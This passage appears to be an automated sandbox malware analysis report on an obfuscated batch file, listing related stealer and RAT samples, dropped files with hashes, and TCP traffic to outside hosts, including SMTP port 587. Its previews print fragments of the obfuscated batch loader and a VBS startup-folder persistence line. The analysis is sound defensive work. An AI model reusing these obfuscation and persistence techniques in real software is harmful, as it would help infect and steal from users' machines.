                                                                P.O_Qouts_t87E90Y-E4R7G-PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 118.27.130.234
                                                                Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 163.44.198.71
                                                                Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 118.27.130.234
                                                                TUT-ASUSwKj1CBkbos.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                                • 208.95.112.1
                                                                FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                • 208.95.112.1
                                                                Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • 208.95.112.1
                                                                bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                • 208.95.112.1
                                                                sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Transferencia.docGet hashmaliciousQuasarBrowse
                                                                • 208.95.112.1
                                                                SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                • 208.95.112.1

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Roaming\ChannelUris.bat.Zheip4.cmdGet hashmaliciousUnknownBrowse
                                                                  https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                                                    849128312.cmdGet hashmaliciousUnknownBrowse
                                                                      Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                                        Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                          Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                                                            Original Invoice.vbsGet hashmaliciousUnknownBrowse
                                                                              FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbsGet hashmaliciousUnknownBrowse
                                                                                Adjunto factura.vbsGet hashmaliciousUnknownBrowse
                                                                                  DHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse
                                                                                    C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zheip4.cmdGet hashmaliciousUnknownBrowse
                                                                                      https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                                                                        849128312.cmdGet hashmaliciousUnknownBrowse
                                                                                          Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                            Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                              Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                Original Invoice.vbsGet hashmaliciousUnknownBrowse
                                                                                                  FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbsGet hashmaliciousUnknownBrowse
                                                                                                    Adjunto factura.vbsGet hashmaliciousUnknownBrowse
                                                                                                      DHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41utsmme.lr0.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugmfo5g.xfc.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjg1ezd5.dmv.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Roaming\ChannelUris.bat

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1410688
                                                                                                        Entropy (8bit):6.035854223533468
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:EzjRK1a2Msx3L94rGyUv5r7DFwr/CiAhGDgkSEDKhkkuyGWwX2Juctve:EzamrsdkkmtEW
                                                                                                        MD5:0403CB08CD9A055952E1153DFD5A2E0E
                                                                                                        SHA1:B42D3E9E49A30671D54217268AE15E6C23B0F226
                                                                                                        SHA-256:5BE496E81C311CC8C78B7D6422FB51E4B4FC3E332EF54EAE2BC6495DAC60ACC7
                                                                                                        SHA-512:1B67F79532FF60F23FEE068D97084382EBE100B4ED9AD46E319C3FCA543F4340EFF9E4C353428AF4FB47A817F4B44221CA810EB3C7A7F1152A3A67AA6AA6470A
                                                                                                        Malicious:false
                                                                                                        Preview:@chcp 65001..set ".......=dows\S"..set "........=l\v1.0"..:: Bczkmujjcni..:: Ewhkjpcmbhq Rswglx..:: Mjfzxhis Tcibod Ycvjsckvl..set "........=/q /y "..set ".....=exe %~0.Zhe"..:: Vaepfes Fxejqhddznr Nwmmw..:: Xoygnz Lfoweuyaee Iwyea..:: Swuzyzqkj Kfbmwu Lhsakfprzcn..set ".....=shell."..set "......=C:\Win"..:: Wfviqujpev..set ".........=/h /i "..set "......=echo F"..set ".......=4\Wind"..:: Ldtotk Hgwjejc Xpvmikfji..:: Jjgvhfahlk..set "........=\power"..set ".......=ysWOW6"..:: Xialmaeky Ijbsnnw..set ".......=erShel"..set ".....=owsPow"..set ".....= | xco"..:: Gqzeqksl Ixjckikqycj Hhsivlxuhoy..:: Syrpuqfzd Mlrdcpyzxj..set ".....=py /d "...%......%%.....%%.....%%........%%.........%%......%%.......%%.......%%.......%%.....%%.......%%........%%........%%.....%%.....%...set ".........=attr

                                                                                                        C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\xcopy.exe
                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):433152
                                                                                                        Entropy (8bit):5.502549953174867
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                                        SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                                        SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: ip4.cmd, Detection: malicious, Browse
                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                        • Filename: 849128312.cmd, Detection: malicious, Browse
                                                                                                        • Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Rechnung0192839182.pdf, Detection: malicious, Browse
                                                                                                        • Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Original Invoice.vbs, Detection: malicious, Browse
                                                                                                        • Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Adjunto factura.vbs, Detection: malicious, Browse
                                                                                                        • Filename: DHL-AWB#TRACKING907853880911.bat, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\ChannelUris.bat:Zone.Identifier

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):26
                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:false
                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):89
                                                                                                        Entropy (8bit):4.631326307867943
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:FER/n0eFHHoN+EaKC5vLFz4nHn:FER/lFHIN7aZ5vLSH
                                                                                                        MD5:2B48623C11AC2E9942431A79E4956B5A
                                                                                                        SHA1:3196F5855533133279AF7689323F51E333DF1B07
                                                                                                        SHA-256:1EF9172E283A367E986753783B1963724043EF68BB0FA6E5198FEBCB3B2A1D20
                                                                                                        SHA-512:1603273F6C782CB22DAB1F6643DE426258118E2042BB0FF475C0BC99F94893CD251D1D370007F3BD06A91437A75F78527115DDD265D7A356126D6A31057B2A66
                                                                                                        Malicious:true
                                                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ChannelUris.bat"""

                                                                                                        C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\xcopy.exe
                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):433152
                                                                                                        Entropy (8bit):5.502549953174867
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                                        SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                                        SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: ip4.cmd, Detection: malicious, Browse
                                                                                                        • Filename: , Detection: malicious, Browse
                                                                                                        • Filename: 849128312.cmd, Detection: malicious, Browse
                                                                                                        • Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Rechnung0192839182.pdf, Detection: malicious, Browse
                                                                                                        • Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Original Invoice.vbs, Detection: malicious, Browse
                                                                                                        • Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
                                                                                                        • Filename: Adjunto factura.vbs, Detection: malicious, Browse
                                                                                                        • Filename: DHL-AWB#TRACKING907853880911.bat, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:Unicode text, UTF-8 text, with very long lines (56494), with CRLF, CR, LF line terminators
                                                                                                        Entropy (8bit):6.035854223533468
                                                                                                        TrID:
                                                                                                          File name:87M9Y3P4Z7.bat
                                                                                                          File size:1'410'688 bytes
                                                                                                          MD5:0403cb08cd9a055952e1153dfd5a2e0e
                                                                                                          SHA1:b42d3e9e49a30671d54217268ae15e6c23b0f226
                                                                                                          SHA256:5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7
                                                                                                          SHA512:1b67f79532ff60f23fee068d97084382ebe100b4ed9ad46e319c3fca543f4340eff9e4c353428af4fb47a817f4b44221ca810eb3c7a7f1152a3a67aa6aa6470a
                                                                                                          SSDEEP:24576:EzjRK1a2Msx3L94rGyUv5r7DFwr/CiAhGDgkSEDKhkkuyGWwX2Juctve:EzamrsdkkmtEW
                                                                                                          TLSH:806523001E603E259D1057F864EF4D6D2ABCEE861F1DF2E832A444D687DAE46972FC2D
                                                                                                          File Content Preview:@chcp 65001..set "..............=dows\S"..set "................=l\v1.0"..:: Bczkmujjcni..:: Ewhkjpcmbhq Rswglx..:: Mjfzxhis Tcibod Ycvjsckvl..set "................=/q /y "..set "..........=exe %~0.Zhe"..:: Vaepfes Fxejqhddznr Nwmmw..:: Xoygnz Lfoweuyaee I

                                                                                                          File Icon

                                                                                                          Icon Hash:9686878b929a9886

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 17:41:16.805107117 CET4973780192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:16.810597897 CET8049737208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:16.810707092 CET4973780192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:16.811645031 CET4973780192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:16.817334890 CET8049737208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:17.400742054 CET8049737208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:17.452414989 CET4973780192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:20.050688982 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:20.066595078 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:20.070292950 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:21.356705904 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:21.357043028 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:21.362334967 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:21.723855019 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:21.724169970 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:21.729677916 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.095032930 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.101351023 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:22.106662035 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.478831053 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.478864908 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.478914976 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:22.478924990 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:22.530637980 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:22.869947910 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:22.875289917 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.237629890 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.254307985 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:23.259685993 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.621037960 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.622133970 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:23.627484083 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.988986015 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:23.989489079 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:23.994893074 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:24.388179064 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:24.388678074 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:24.394100904 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:24.755070925 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:24.755561113 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:24.760888100 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.621496916 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.621840000 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:25.627218962 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.988209009 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.989026070 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:25.989098072 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:25.989118099 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:25.989150047 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:25.994313955 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.994343042 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.994494915 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:25.994503021 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:26.360800028 CET58749757163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:26.405534983 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:31.758069038 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:31.763554096 CET8049822208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:31.763633966 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:31.764034986 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:31.769370079 CET8049822208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:32.394145966 CET8049822208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:41:32.530543089 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:33.056555033 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:33.066451073 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:33.066528082 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:33.880177021 CET4973780192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:41:33.880330086 CET49757587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:34.179423094 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:34.179703951 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:34.195626020 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:34.555011034 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:34.555181980 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:34.571980000 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:34.934617043 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:34.938138008 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:34.943489075 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.317493916 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.317794085 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.317806959 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.317851067 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:35.318675995 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.318736076 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:35.320169926 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:35.325503111 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.682499886 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:35.701322079 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:35.706702948 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.063385010 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.063849926 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:36.069209099 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.426508904 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.426975012 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:36.432638884 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.802505970 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:36.802884102 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:36.808171988 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.173789978 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.174113989 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.179758072 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.590363979 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.590603113 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.595952988 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.952110052 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.952931881 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.952999115 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.953022957 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.953049898 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:41:37.958245039 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.958268881 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.958393097 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:37.958403111 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:38.321238041 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:41:38.374380112 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:42:09.062134027 CET8049822208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:42:09.062267065 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:42:23.062182903 CET4982280192.168.2.6208.95.112.1
                                                                                                          Oct 30, 2024 17:42:23.067811966 CET8049822208.95.112.1192.168.2.6
                                                                                                          Oct 30, 2024 17:43:13.078275919 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:43:13.343168020 CET49828587192.168.2.6163.44.198.71
                                                                                                          Oct 30, 2024 17:43:13.347696066 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:43:13.349097013 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:43:13.704154968 CET58749828163.44.198.71192.168.2.6
                                                                                                          Oct 30, 2024 17:43:13.710345030 CET49828587192.168.2.6163.44.198.71

                                                                                                          UDP Packets

